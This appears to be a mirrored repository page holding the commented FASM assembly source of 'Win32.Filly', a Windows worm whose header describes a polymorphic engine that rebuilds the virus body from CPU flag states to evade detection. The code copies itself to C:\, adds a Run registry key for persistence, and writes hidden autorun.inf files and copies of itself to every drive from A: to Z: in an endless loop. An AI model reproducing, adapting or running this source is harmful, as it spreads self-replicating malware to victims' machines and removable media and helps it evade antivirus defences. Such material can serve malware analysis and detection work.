mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
1960 lines
41 KiB
Plaintext
1960 lines
41 KiB
Plaintext
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
;;
|
|
;; Win32.Filly
|
|
;; by SPTH
|
|
;; February 2012
|
|
;;
|
|
;;
|
|
;; This is a worm which spreads via network/removable/USB drives.
|
|
;;
|
|
;; It uses a novel polymorphic engine, namely the virusbody is created
|
|
;; at runtime using flags. The virusbody does not exist in any encrypted
|
|
;; data or transformed code, but just appears as shadow of the execution of
|
|
;; some overlayed instruction-flow.
|
|
;;
|
|
;; Every nibble (half byte) of the virus is represented as a code which
|
|
;; sets or clears SF,AF,PF,CF. After the code snippet of one nibble is
|
|
;; executed, either LAHF or PUSHFD is used to get the flags. The flags
|
|
;; are saved in an allocated memory, which will be executed after
|
|
;; the reconstruction.
|
|
;;
|
|
;; It can use one out of 5 ways to fully determine SF,AF,PF,CF:
|
|
;;
|
|
;; 5 | 0+4 | 1+4 | 2+4 | 4+0
|
|
;;
|
|
;; where each number represents a set of instruction with different behaviour
|
|
;; with respect to flags:
|
|
;;
|
|
;; 0: CF:
|
|
;; ROL, ROR
|
|
;;
|
|
;; 1: AF, CF (PF, SF undefined):
|
|
;; AAA, AAS
|
|
;;
|
|
;; 2: CF PF (AF undefined, SF undefined);
|
|
;; SHL, SHR, SAL, SAR
|
|
;;
|
|
;; 3: PF SF (AF undefined, CF undefined):
|
|
;; AND, XOR, TEST
|
|
;;
|
|
;; 4: AF PF SF:
|
|
;; DEC, INC
|
|
;;
|
|
;; 5: AF CF PF SF:
|
|
;; ADD, CMP, NEG, SUB
|
|
;;
|
|
;; All sets can be used as functional trash code, prior to the actual determining
|
|
;; instruction sets. Registers and type (Instr Reg1, Reg2 or Instr Reg1, NNNN) are
|
|
;; random in that case.
|
|
;;
|
|
;; For finding the correct composition of instruction and register values to get
|
|
;; the the desired flag combination, I use a semi-deterministic algorithm. This means
|
|
;; i give correct flag dependences, the the code goes in a loop searching randomly
|
|
;; for correct parameters - for each nibble of the code. In some cases, a desired
|
|
;; combination of flags can not be created with the choosen instruction - in that case
|
|
;; after 42 loops, an infinite-loop handler is called, which exits the loops and choses
|
|
;; another instruction to create the flag-combination. This procedere is unexpectedly
|
|
;; fast - in fact, even there are ~6100 random loops running, there is no noticeable
|
|
;; delay.
|
|
;;
|
|
;; The encrypted code-flow has a different size each generation. As its boring to code a
|
|
;; file size adjustment tool, I keep a constant filesize with following statistical
|
|
;; argument: In a set of 20 different files, I looked at the maximum size the used
|
|
;; code section: 175713, 175477, 175261, 175262, 177070, 176241, 177109, 175749, 172610,
|
|
;; 176471, 174657, 174682, 175275, 176186, 176004, 174359, 173549, 174638, 174684, 173893 bytes.
|
|
;; Average of the set: 175269 +/- 1148.65.
|
|
;; For padding, I used average + 7 sigma = 183'312. The probability that something
|
|
;; goes wrong is 1 / (390'682'215'445), while the probability that everything goes
|
|
;; right is 99.999999999744% - this is enough for my taste :)
|
|
;;
|
|
;; Now here you can see a generated code:
|
|
;;
|
|
;; 004020B5 . B8 A0AC599E MOV EAX,9E59ACA0
|
|
;; 004020BA . C1E0 82 SHL EAX,82
|
|
;; 004020BD . B8 A5AF1B60 MOV EAX,601BAFA5
|
|
;; 004020C2 . 48 DEC EAX
|
|
;; 004020C3 . 9C PUSHFD
|
|
;; 004020C4 . 5A POP EDX
|
|
;; 004020C5 . 8817 MOV BYTE PTR DS:[EDI],DL
|
|
;; 004020C7 . 47 INC EDI
|
|
;; 004020C8 . B9 CBC5FCAC MOV ECX,ACFCC5CB
|
|
;; 004020CD . B8 550D859F MOV EAX,9F850D55
|
|
;; 004020D2 . 29C1 SUB ECX,EAX
|
|
;; 004020D4 . 9C PUSHFD
|
|
;; 004020D5 . 58 POP EAX
|
|
;; 004020D6 . AA STOS BYTE PTR ES:[EDI]
|
|
;; 004020D7 . B8 CB5183AB MOV EAX,AB8351CB
|
|
;; 004020DC . B9 EEF33292 MOV ECX,9232F3EE
|
|
;; 004020E1 . D3C0 ROL EAX,CL
|
|
;; 004020E3 . BA 8B47E2EB MOV EDX,EBE2478B
|
|
;; 004020E8 . 4A DEC EDX
|
|
;; 004020E9 . 9F LAHF
|
|
;; 004020EA . 8827 MOV BYTE PTR DS:[EDI],AH
|
|
;; 004020EC . 47 INC EDI
|
|
;; 004020ED . BA F065255E MOV EDX,5E2565F0
|
|
;; 004020F2 . B9 A5D9FA8B MOV ECX,8BFAD9A5
|
|
;; 004020F7 . 01CA ADD EDX,ECX
|
|
;; 004020F9 . B8 8E0FB438 MOV EAX,38B40F8E
|
|
;; 004020FE . 3F AAS
|
|
;; 004020FF . BB 6B6AF3EA MOV EBX,EAF36A6B
|
|
;; 00402104 . B8 7B9CB043 MOV EAX,43B09C7B
|
|
;; 00402109 . 01C3 ADD EBX,EAX
|
|
;; 0040210B . 9F LAHF
|
|
;; 0040210C . 8827 MOV BYTE PTR DS:[EDI],AH
|
|
;; 0040210E . 47 INC EDI
|
|
;;
|
|
;; This code generates 2 bytes of the virus code.
|
|
;;
|
|
;;
|
|
;;
|
|
;; Thanks alot to hh86 for telling me about this non-standard code
|
|
;; representation she is working on, and for pointing out that LAHF
|
|
;; is actually *very* useful :)
|
|
;;
|
|
;; This is the second member of a new series of self-replicators:
|
|
;; - Win32.Kitti (overlapping code engine; in valhalla#1)
|
|
;; - Win32.Filly (code as shadow of overlayed instruction flow; in valhalla#2)
|
|
;;
|
|
;;
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
|
|
|
|
include 'E:\Programme\FASM\INCLUDE\win32ax.inc'
|
|
|
|
.data
|
|
hMyFileName dd 0x0
|
|
hFileHandle dd 0x0
|
|
hMapHandle dd 0x0
|
|
hMapViewAddress dd 0x0
|
|
|
|
hFileCodeStart dd 0x0
|
|
|
|
RandomNumber dd 0x0
|
|
|
|
SpaceForHDC: dd 0x0 ; should be 0x0, C:\
|
|
RandomFileName: times 13 db 0x0
|
|
|
|
|
|
SpaceForHDC2: dd 0x0 ; should be 0x0, X:\
|
|
RandomFileName2:times 13 db 0x0
|
|
|
|
stKey: times 47 db 0x0 ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0x0
|
|
hKey dd 0x0
|
|
|
|
|
|
stAutorunWithDrive db 0x0, 0x0, 0x0 ; "X:\"
|
|
stAutoruninf: times 12 db 0x0 ; "autorun.inf"
|
|
|
|
|
|
|
|
stAutoRunContent: times 52 db 0x0
|
|
|
|
|
|
hCreateFileAR dd 0x0
|
|
hCreateFileMappingAR dd 0x0
|
|
|
|
constFileSize EQU 185344
|
|
constCodeStart EQU 0x400
|
|
|
|
FlagMask db 0x0 ; S00A'0P1C
|
|
MaskNibble0 EQU 0000'0001b
|
|
MaskNibble1 EQU 0001'0001b
|
|
MaskNibble2 EQU 0000'0101b
|
|
MaskNibble3 EQU 1000'0100b
|
|
MaskNibble4 EQU 1001'0100b
|
|
MaskNibble5 EQU 1001'0101b
|
|
MaskRandom EQU 0000'0000b ; no content - for trash
|
|
|
|
VerifiedAddress dd 0x0
|
|
|
|
|
|
MyStartAddresse dd 0x0
|
|
|
|
NibbleData db 0x0
|
|
|
|
DecryptedCode dd 0x0
|
|
|
|
|
|
|
|
.code
|
|
start:
|
|
; ###########################################################################
|
|
; #####
|
|
; ##### Preparation (copy file, get kernel, ...)
|
|
; #####
|
|
|
|
StartEngine:
|
|
call GetMyStartAddresse
|
|
GetMyStartAddresse:
|
|
pop eax
|
|
sub eax, (GetMyStartAddresse-StartEngine)
|
|
|
|
mov dword[MyStartAddresse], eax
|
|
|
|
|
|
|
|
push 0x8007
|
|
stdcall dword[SetErrorMode]
|
|
|
|
stdcall dword[GetCommandLineA]
|
|
mov dword[hMyFileName], eax
|
|
cmp byte[eax], '"'
|
|
jne FileNameIsFine
|
|
inc eax
|
|
mov dword[hMyFileName], eax
|
|
|
|
FindFileNameLoop:
|
|
inc eax
|
|
cmp byte[eax], '"'
|
|
jne FindFileNameLoop
|
|
|
|
mov byte[eax], 0x0
|
|
FileNameIsFine:
|
|
|
|
|
|
stdcall dword[GetTickCount]
|
|
mov dword[RandomNumber], eax
|
|
|
|
xor esi, esi
|
|
CopyFileAndRegEntryMore:
|
|
mov ebx, 26
|
|
mov ecx, 97
|
|
call CreateSpecialRndNumber
|
|
|
|
mov byte[RandomFileName+esi], dl
|
|
inc esi
|
|
cmp esi, 8
|
|
jb CopyFileAndRegEntryMore
|
|
|
|
mov eax, ".exe"
|
|
mov dword[RandomFileName+esi], eax
|
|
|
|
mov al, "C"
|
|
mov byte[SpaceForHDC+1], al
|
|
mov al, ":"
|
|
mov byte[SpaceForHDC+2], al
|
|
mov al, "\"
|
|
mov byte[SpaceForHDC+3], al
|
|
|
|
push FALSE
|
|
push SpaceForHDC+1
|
|
push dword[hMyFileName]
|
|
stdcall dword[CopyFileA]
|
|
|
|
|
|
|
|
; #####
|
|
; ##### Preparation (copy file, get kernel, ...)
|
|
; #####
|
|
; ###########################################################################
|
|
|
|
|
|
; ###########################################################################
|
|
; #####
|
|
; ##### Open New File
|
|
; #####
|
|
|
|
push 0x0
|
|
push FILE_ATTRIBUTE_NORMAL
|
|
push OPEN_ALWAYS
|
|
push 0x0
|
|
push 0x0
|
|
push (GENERIC_READ or GENERIC_WRITE)
|
|
push SpaceForHDC+1
|
|
stdcall dword[CreateFileA]
|
|
|
|
cmp eax, INVALID_HANDLE_VALUE
|
|
je IVF_NoCreateFile
|
|
mov dword[hFileHandle], eax
|
|
|
|
push 0x0
|
|
push constFileSize
|
|
push 0x0 ; nFileSizeHigh=0 from above
|
|
push PAGE_READWRITE
|
|
push 0x0
|
|
push dword[hFileHandle]
|
|
stdcall dword[CreateFileMappingA]
|
|
|
|
cmp eax, 0x0
|
|
je IVF_NoCreateMap
|
|
mov dword[hMapHandle], eax
|
|
|
|
push constFileSize
|
|
push 0x0
|
|
push 0x0
|
|
push FILE_MAP_WRITE
|
|
push dword[hMapHandle]
|
|
stdcall dword[MapViewOfFile]
|
|
|
|
cmp eax, 0x0
|
|
je IVF_NoMapView
|
|
mov dword[hMapViewAddress], eax
|
|
|
|
; #####
|
|
; ##### Open New File
|
|
; #####
|
|
; ###########################################################################
|
|
|
|
call DoNibbleTrafo
|
|
|
|
|
|
; ###########################################################################
|
|
; #####
|
|
; ##### Close New File
|
|
; #####
|
|
|
|
IVF_CloseMapView:
|
|
push dword[hMapViewAddress]
|
|
stdcall dword[UnmapViewOfFile]
|
|
|
|
IVF_NoMapView:
|
|
push dword[hMapHandle]
|
|
stdcall dword[CloseHandle]
|
|
|
|
IVF_NoCreateMap:
|
|
push dword[hFileHandle]
|
|
stdcall dword[CloseHandle]
|
|
|
|
IVF_NoCreateFile:
|
|
|
|
; #####
|
|
; ##### Close New File
|
|
; #####
|
|
; ###########################################################################
|
|
|
|
|
|
; invoke ExitProcess, 0
|
|
|
|
; ###########################################################################
|
|
; #####
|
|
; ##### Spread this kitty ;)
|
|
; #####
|
|
|
|
SpreadKitty:
|
|
; Representation of "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
|
|
; One could permute it - but too lazy for doing this task atm :)
|
|
|
|
mov eax, stKey
|
|
mov dword[eax+0x00], "SOFT"
|
|
mov dword[eax+0x04], "WARE"
|
|
mov dword[eax+0x08], "\Mic"
|
|
mov dword[eax+0x0C], "roso"
|
|
mov dword[eax+0x10], "ft\W"
|
|
mov dword[eax+0x14], "indo"
|
|
mov dword[eax+0x18], "ws\C"
|
|
mov dword[eax+0x1C], "urre"
|
|
mov dword[eax+0x20], "ntVe"
|
|
mov dword[eax+0x24], "rsio"
|
|
mov dword[eax+0x28], "n\Ru"
|
|
mov byte[eax+0x2C], "n"
|
|
|
|
push 0x0
|
|
push hKey
|
|
push 0x0
|
|
push KEY_ALL_ACCESS
|
|
push REG_OPTION_NON_VOLATILE
|
|
push 0x0
|
|
push 0x0
|
|
push stKey
|
|
push HKEY_LOCAL_MACHINE
|
|
stdcall dword[RegCreateKeyExA]
|
|
|
|
push 16
|
|
push SpaceForHDC+1
|
|
push REG_SZ
|
|
push 0x0
|
|
push 0x0
|
|
push dword[hKey]
|
|
stdcall dword[RegSetValueExA]
|
|
|
|
push dword[hKey]
|
|
stdcall dword[RegCloseKey]
|
|
|
|
xor eax, eax
|
|
mov dword[stAutorunWithDrive], "X:\a"
|
|
mov dword[stAutorunWithDrive+2], "\aut"
|
|
mov dword[stAutoruninf+3], "orun"
|
|
mov dword[stAutoruninf+7], ".inf"
|
|
|
|
mov dword[stAutoRunContent], "[Aut"
|
|
mov dword[stAutoRunContent+0x04], "orun"
|
|
mov dword[stAutoRunContent+0x08], 0x530A0D5D
|
|
mov dword[stAutoRunContent+0x0C], "hell" ; !!!!!!!
|
|
mov dword[stAutoRunContent+0x10], "Exec"
|
|
mov dword[stAutoRunContent+0x14], "ute="
|
|
mov eax, dword[RandomFileName] ; Filename: XXXXxxxx.exe
|
|
mov dword[stAutoRunContent+0x18], eax
|
|
mov eax, dword[RandomFileName+0x4] ; Filename: xxxxXXXX.exe
|
|
mov dword[stAutoRunContent+0x1C], eax
|
|
mov dword[stAutoRunContent+0x20], ".exe"
|
|
mov dword[stAutoRunContent+0x24], 0x73550A0D
|
|
mov dword[stAutoRunContent+0x28], "eAut"
|
|
mov dword[stAutoRunContent+0x2C], "opla"
|
|
mov dword[stAutoRunContent+0x30], 0x00313D79
|
|
|
|
; i like that coding style, roy g biv! :))
|
|
push 51
|
|
push 0x0
|
|
push 0x0
|
|
push FILE_MAP_ALL_ACCESS
|
|
push 0x0
|
|
push 51
|
|
push 0x0
|
|
push PAGE_READWRITE
|
|
push 0x0
|
|
push 0x0
|
|
push FILE_ATTRIBUTE_HIDDEN
|
|
push OPEN_ALWAYS
|
|
push 0x0
|
|
push 0x0
|
|
push (GENERIC_READ or GENERIC_WRITE)
|
|
push stAutoruninf
|
|
|
|
stdcall dword[CreateFileA]
|
|
push eax
|
|
mov dword[hCreateFileAR], eax
|
|
stdcall dword[CreateFileMappingA]
|
|
push eax
|
|
mov dword[hCreateFileMappingAR], eax
|
|
stdcall dword[MapViewOfFile]
|
|
|
|
xor cl, cl
|
|
mov esi, stAutoRunContent
|
|
MakeAutoRunInfoMore:
|
|
mov bl, byte[esi]
|
|
mov byte[eax], bl
|
|
inc eax
|
|
inc esi
|
|
inc ecx
|
|
cmp cl, 51
|
|
jb MakeAutoRunInfoMore
|
|
|
|
sub eax, 51
|
|
push dword[hCreateFileAR]
|
|
push dword[hCreateFileMappingAR]
|
|
push eax
|
|
stdcall dword[UnmapViewOfFile]
|
|
stdcall dword[CloseHandle]
|
|
stdcall dword[CloseHandle]
|
|
|
|
mov dword[SpaceForHDC2+1], "A:\."
|
|
mov eax, dword[RandomFileName]
|
|
mov dword[RandomFileName2], eax ; XXXXxxxx.exe
|
|
mov eax, dword[RandomFileName+0x04]
|
|
mov dword[RandomFileName2+0x04], eax ; xxxxXXXX.exe
|
|
mov eax, dword[RandomFileName+0x08]
|
|
mov dword[RandomFileName2+0x08], eax ; .exe
|
|
|
|
|
|
SpreadKittyAnotherTime:
|
|
mov dword[SpaceForHDC2], 0x003A4100 ; 0x0, "A:", 0x0
|
|
|
|
STKAnotherRound:
|
|
push SpaceForHDC2+1
|
|
stdcall dword[GetDriveTypeA]
|
|
|
|
xor ebx, ebx ; 0 ... No Drive
|
|
; 1 ... Drive (without autorun.inf)
|
|
; 2 ... Drive (with autorun.inf)
|
|
|
|
mov cl, '\'
|
|
mov byte[SpaceForHDC2+3],cl
|
|
|
|
|
|
cmp al, 0x2
|
|
je STKWithAutoRun
|
|
|
|
cmp al, 0x3
|
|
je STKWithoutAutoRun
|
|
|
|
cmp al, 0x4
|
|
je STKWithAutoRun
|
|
|
|
cmp al, 0x6
|
|
je STKWithAutoRun
|
|
|
|
jmp STKCreateEntriesForNextDrive
|
|
|
|
STKWithAutoRun:
|
|
|
|
push FALSE
|
|
push stAutorunWithDrive
|
|
push stAutoruninf
|
|
stdcall dword[CopyFileA]
|
|
|
|
STKWithoutAutoRun:
|
|
|
|
push FALSE
|
|
push SpaceForHDC2+1
|
|
push SpaceForHDC+1
|
|
stdcall dword[CopyFileA]
|
|
|
|
|
|
STKCreateEntriesForNextDrive:
|
|
xor eax, eax
|
|
mov al, byte[SpaceForHDC2+1]
|
|
cmp al, "Z"
|
|
je SpreadThisKittyEnd
|
|
|
|
inc al
|
|
mov byte[SpaceForHDC2+1], al ; next drive
|
|
mov byte[stAutorunWithDrive], al ; next drive
|
|
mov byte[SpaceForHDC2+3], ah ; 0x0, "X:", 0x0
|
|
jmp STKAnotherRound
|
|
|
|
|
|
SpreadThisKittyEnd:
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
and eax, (0x8000 - 1) ; 0-32 sec
|
|
|
|
push eax
|
|
stdcall dword[Sleep]
|
|
|
|
call GetRandomNumber
|
|
mov eax, dword[RandomNumber]
|
|
and eax, (0x100-1)
|
|
jnz SpreadKittyAnotherTime
|
|
|
|
jmp SpreadKittyAnotherTime
|
|
|
|
; #####
|
|
; ##### Spread this kitty ;)
|
|
; #####
|
|
; ###########################################################################
|
|
|
|
|
|
|
|
DoNibbleTrafo:
|
|
|
|
mov edi, dword[hMapViewAddress]
|
|
add edi, constCodeStart
|
|
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
;;
|
|
;; First create the VirtualAlloc code and save the value
|
|
;;
|
|
|
|
virtual at 0 ; cool FASM feature:
|
|
; this compiles code virtually
|
|
; and one can use variables to access it
|
|
; ideal for our purpose :)
|
|
invoke VirtualAlloc, 0x0, 100'000, 0x1000, PAGE_EXECUTE_READWRITE
|
|
mov dword[DecryptedCode], eax
|
|
xchg edi, eax
|
|
mov edi, edi ; just for padding...
|
|
; uuhh, do we know this instruction? ;)
|
|
|
|
load iVirtualCodeA dword from 0
|
|
load iVirtualCodeB dword from 4
|
|
load iVirtualCodeC dword from 8
|
|
load iVirtualCodeD dword from 12
|
|
load iVirtualCodeE dword from 16
|
|
load iVirtualCodeF dword from 20
|
|
load iVirtualCodeG dword from 24 ; i hate "word", 2byte data-types.
|
|
end virtual ; they are just unelegant...
|
|
|
|
|
|
mov dword[edi+00], iVirtualCodeA
|
|
mov dword[edi+04], iVirtualCodeB
|
|
mov dword[edi+08], iVirtualCodeC
|
|
mov dword[edi+12], iVirtualCodeD
|
|
mov dword[edi+16], iVirtualCodeE
|
|
mov dword[edi+20], iVirtualCodeF
|
|
mov dword[edi+24], iVirtualCodeG
|
|
add edi, 26
|
|
|
|
mov dword[VerifiedAddress], edi
|
|
|
|
;;
|
|
;; First create the VirtualAlloc code and save the value
|
|
;;
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
|
|
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
;;
|
|
;; Now create the whole representation of the code in form of flags
|
|
;; of some other random code ( main engine )
|
|
;;
|
|
mov esi, dword[MyStartAddresse]
|
|
|
|
CreateCodeForAllBytes:
|
|
mov al, byte[esi]
|
|
|
|
mov byte[NibbleData], al
|
|
and byte[NibbleData], 0000'1111b
|
|
push esi
|
|
call CreateCodeForNibble
|
|
pop esi
|
|
|
|
mov al, byte[esi]
|
|
shr al, 4 ; get the second nibble of this byte
|
|
mov byte[NibbleData], al
|
|
and byte[NibbleData], 0000'1111b
|
|
push esi
|
|
call CreateCodeForNibble
|
|
pop esi
|
|
|
|
inc esi
|
|
|
|
mov ebx, dword[MyStartAddresse]
|
|
add ebx, (WholeCodeEnd-StartEngine)
|
|
cmp esi, ebx
|
|
jne CreateCodeForAllBytes
|
|
|
|
|
|
;;
|
|
;; Now create the whole representation of the code in form of flags
|
|
;; of some other random code ( main engine )
|
|
;;
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
;;
|
|
;; In the end, rearrange the information to extract the viral code
|
|
;;
|
|
|
|
virtual at 0
|
|
mov ecx, dword[DecryptedCode]
|
|
mov edx, ecx
|
|
|
|
ReorganizeMore:
|
|
mov bh, byte[ecx]
|
|
inc ecx
|
|
push 0 ; Some PIC workaround :)
|
|
jmp Decrypt
|
|
ReorganizeFirstNibbleBack:
|
|
|
|
and al, 0000'1111b
|
|
push eax
|
|
|
|
|
|
|
|
mov bh, byte[ecx]
|
|
inc ecx
|
|
|
|
push 1
|
|
jmp Decrypt
|
|
ReorganizeSecondNibbleBack:
|
|
|
|
and al, 0000'1111b
|
|
shl al, 4
|
|
pop ebx
|
|
add al, bl
|
|
|
|
mov byte[edx], al
|
|
inc edx
|
|
mov eax, dword[DecryptedCode]
|
|
add eax, (WholeCodeEnd-StartEngine)
|
|
|
|
cmp edx, eax
|
|
jne ReorganizeMore
|
|
|
|
jmp dword[DecryptedCode]
|
|
|
|
|
|
Decrypt:
|
|
|
|
; in: bh=S00A'0P1C
|
|
; out: al=0000'SAPC
|
|
mov al, bh ; al=S00A'0P1C
|
|
and al, 0000'0001b ; al=0000'000C
|
|
|
|
shr bh, 1 ; bh=0S00'A0P1
|
|
push ebx
|
|
and bh, 0000'0010b ; bh=0000'00P0
|
|
add al, bh ; al=0000'00PC
|
|
|
|
pop ebx ; bh=0S00'A0P1
|
|
shr bh, 1 ; bh=00S0'0A0P
|
|
push ebx
|
|
and bh, 0000'0100b ; bh=0000'0A00
|
|
add al, bh ; al=0000'0APC
|
|
|
|
pop ebx ; bh=00S0'0A0P
|
|
shr bh, 2 ; bh=0000'S00A
|
|
and bh, 0000'1000b ; bh=0000'S000
|
|
add al, bh ; al=0000'SAPC
|
|
|
|
pop ebx
|
|
test ebx, ebx
|
|
|
|
jz ReorganizeFirstNibbleBack
|
|
jmp ReorganizeSecondNibbleBack
|
|
|
|
load cVirtualCodeA dword from 0 ; Most likely there is a more elegant
|
|
load cVirtualCodeB dword from 4 ; way to handle this requirement
|
|
load cVirtualCodeC dword from 8 ; using a FASM macro.
|
|
load cVirtualCodeD dword from 12
|
|
load cVirtualCodeE dword from 16 ; But i couldnt find one - tell me
|
|
load cVirtualCodeF dword from 20 ; if you know a way to copy data
|
|
load cVirtualCodeG dword from 24 ; to a memory addresse from a
|
|
load cVirtualCodeH dword from 28 ; virtual compilation space.
|
|
load cVirtualCodeI dword from 32
|
|
load cVirtualCodeJ dword from 36
|
|
load cVirtualCodeK dword from 40
|
|
load cVirtualCodeL dword from 44
|
|
load cVirtualCodeM dword from 48
|
|
load cVirtualCodeN dword from 52
|
|
load cVirtualCodeO dword from 56
|
|
load cVirtualCodeP dword from 60
|
|
load cVirtualCodeQ dword from 64
|
|
load cVirtualCodeR dword from 68
|
|
load cVirtualCodeS dword from 72
|
|
load cVirtualCodeT dword from 76
|
|
load cVirtualCodeU dword from 80
|
|
load cVirtualCodeV dword from 84
|
|
load cVirtualCodeW dword from 88
|
|
load cVirtualCodeX byte from 92
|
|
|
|
end virtual
|
|
|
|
mov dword[edi+00], cVirtualCodeA
|
|
mov dword[edi+04], cVirtualCodeB
|
|
mov dword[edi+08], cVirtualCodeC
|
|
mov dword[edi+12], cVirtualCodeD
|
|
mov dword[edi+16], cVirtualCodeE
|
|
mov dword[edi+20], cVirtualCodeF
|
|
|
|
mov dword[edi+24], cVirtualCodeG
|
|
mov dword[edi+28], cVirtualCodeH
|
|
mov dword[edi+32], cVirtualCodeI
|
|
mov dword[edi+36], cVirtualCodeJ
|
|
mov dword[edi+40], cVirtualCodeK
|
|
|
|
mov dword[edi+44], cVirtualCodeL
|
|
mov dword[edi+48], cVirtualCodeM
|
|
mov dword[edi+52], cVirtualCodeN
|
|
mov dword[edi+56], cVirtualCodeO
|
|
mov dword[edi+60], cVirtualCodeP
|
|
|
|
mov dword[edi+64], cVirtualCodeQ
|
|
mov dword[edi+68], cVirtualCodeR
|
|
mov dword[edi+72], cVirtualCodeS
|
|
mov dword[edi+76], cVirtualCodeT
|
|
mov dword[edi+80], cVirtualCodeU
|
|
|
|
mov dword[edi+84], cVirtualCodeV
|
|
mov dword[edi+88], cVirtualCodeW
|
|
mov byte[edi+92], cVirtualCodeX
|
|
|
|
;;
|
|
;; In the end, rearrange the information to extract the viral code
|
|
;;
|
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|
|
|
|
|
ret
|
|
|
|
|
|
CreateCodeForNibble:
|
|
; 5 possible algos:
|
|
; -> 5
|
|
; -> 0+4 | 1+4 |2+4
|
|
; -> 4+0
|
|
|
|
|
|
CreateCodeBeginTrash:
|
|
call GetRandomNumber
|
|
test byte[RandomNumber+1], 0000'0011b
|
|
jnz DoNibbleFindAlgo_NoTrashBegin
|
|
mov byte[FlagMask], MaskRandom
|
|
mov bl, byte[RandomNumber+2]
|
|
call GetRandomNumber
|
|
|
|
mov al, byte[RandomNumber]
|
|
and al, 0000'0111b
|
|
|
|
jz GC_Trash_Not0
|
|
call GenerateNibble0
|
|
jmp CreateCodeBeginTrash
|
|
|
|
GC_Trash_Not0:
|
|
dec al
|
|
jz GC_Trash_Not1
|
|
call GenerateNibble1
|
|
jmp CreateCodeBeginTrash
|
|
|
|
GC_Trash_Not1:
|
|
dec al
|
|
jz GC_Trash_Not2
|
|
call GenerateNibble2
|
|
jmp CreateCodeBeginTrash
|
|
|
|
GC_Trash_Not2:
|
|
dec al
|
|
jz GC_Trash_Not3
|
|
call GenerateNibble3
|
|
jmp CreateCodeBeginTrash
|
|
|
|
GC_Trash_Not3:
|
|
dec al
|
|
jz GC_Trash_Not4
|
|
call GenerateNibble4
|
|
jmp CreateCodeBeginTrash
|
|
|
|
GC_Trash_Not4:
|
|
dec al
|
|
jz CreateCodeBeginTrash
|
|
call GenerateNibble5
|
|
|
|
jmp CreateCodeBeginTrash
|
|
DoNibbleFindAlgo_NoTrashBegin:
|
|
|
|
|
|
DoNibbleNewRnd:
|
|
call GetRandomNumber
|
|
mov al, byte[RandomNumber]
|
|
and al, 0000'0111b
|
|
cmp al, 4
|
|
ja DoNibbleNewRnd
|
|
|
|
test al, -1
|
|
|
|
jnz DoNibbleFindAlgoNot5
|
|
; -> 5
|
|
mov byte[FlagMask], MaskNibble5
|
|
mov bl, byte[NibbleData]
|
|
call GenerateNibble5
|
|
jmp DoNibbleFinalize
|
|
|
|
|
|
|
|
DoNibbleFindAlgoNot5:
|
|
|
|
dec al
|
|
jnz DoNibbleFindAlgoNot04
|
|
; -> 0+4
|
|
|
|
mov byte[FlagMask], MaskNibble0
|
|
mov bl, byte[NibbleData]
|
|
call GenerateNibble0
|
|
|
|
mov byte[FlagMask], MaskNibble4
|
|
mov bl, byte[NibbleData]
|
|
call GenerateNibble4
|
|
jmp DoNibbleFinalize
|
|
|
|
|
|
|
|
DoNibbleFindAlgoNot04:
|
|
|
|
dec al
|
|
jnz DoNibbleFindAlgoNot14
|
|
; -> 1+4
|
|
mov byte[FlagMask], MaskNibble5 ; need to clear AF first,
|
|
mov bl, byte[RandomNumber+3] ; otherwise AAA/AAS influence CF
|
|
and bl, 0000'1011b ; clear AF
|
|
call GenerateNibble5
|
|
|
|
mov byte[FlagMask], MaskNibble1
|
|
mov bl, byte[NibbleData]
|
|
call GenerateNibble1
|
|
|
|
mov byte[FlagMask], MaskNibble4
|
|
mov bl, byte[NibbleData]
|
|
call GenerateNibble4
|
|
jmp DoNibbleFinalize
|
|
|
|
|
|
|
|
DoNibbleFindAlgoNot14:
|
|
|
|
dec al
|
|
jnz DoNibbleFindAlgoNot24
|
|
; -> 2+4
|
|
mov byte[FlagMask], MaskNibble2
|
|
mov bl, byte[NibbleData]
|
|
call GenerateNibble2
|
|
|
|
mov byte[FlagMask], MaskNibble4
|
|
mov bl, byte[NibbleData]
|
|
call GenerateNibble4
|
|
jmp DoNibbleFinalize
|
|
|
|
|
|
|
|
DoNibbleFindAlgoNot24:
|
|
; -> 4+0
|
|
|
|
mov byte[FlagMask], MaskNibble4
|
|
mov bl, byte[NibbleData]
|
|
call GenerateNibble4
|
|
|
|
mov byte[FlagMask], MaskNibble0
|
|
mov bl, byte[NibbleData]
|
|
call GenerateNibble0
|
|
; jmp DoNibbleFinalize
|
|
|
|
|
|
DoNibbleFinalize:
|
|
|
|
call GetRandomNumber
|
|
test byte[RandomNumber], 0001'0000b ; LAHF or PUSHFD+POP?
|
|
jnz DoNF_PUSHFD
|
|
|
|
mov byte[edi], 0x9F ; LAHF
|
|
inc edi
|
|
|
|
test byte[RandomNumber], 0000'1000b
|
|
jnz DoNibbleFin_AH
|
|
|
|
test byte[RandomNumber], 0000'0010b
|
|
jnz DoNibbleFinAL_2
|
|
|
|
mov byte[edi+00], 0x88
|
|
mov byte[edi+01], 0xE0 ; mov al, ah
|
|
jmp DoNibbleFinAL_2_X
|
|
|
|
DoNibbleFinAL_2:
|
|
mov byte[edi+00], 0x86
|
|
mov byte[edi+01], 0xC4 ; xchg ah, al
|
|
test byte[RandomNumber], 0000'0100b
|
|
jnz DoNibbleFinAL_2_X
|
|
|
|
mov byte[edi+01], 0xE0 ; xchg al, ah
|
|
DoNibbleFinAL_2_X:
|
|
|
|
mov byte[edi+02], 0xAA ; stos
|
|
add edi, 3
|
|
jmp DoNibbleEnd
|
|
|
|
|
|
|
|
DoNibbleFin_AH:
|
|
mov byte[edi+00], 0x88
|
|
mov byte[edi+01], 0x27 ; mov byte[edi], ah
|
|
mov byte[edi+02], 0x47 ; inc edi (thx hh86 :D)
|
|
add edi, 3
|
|
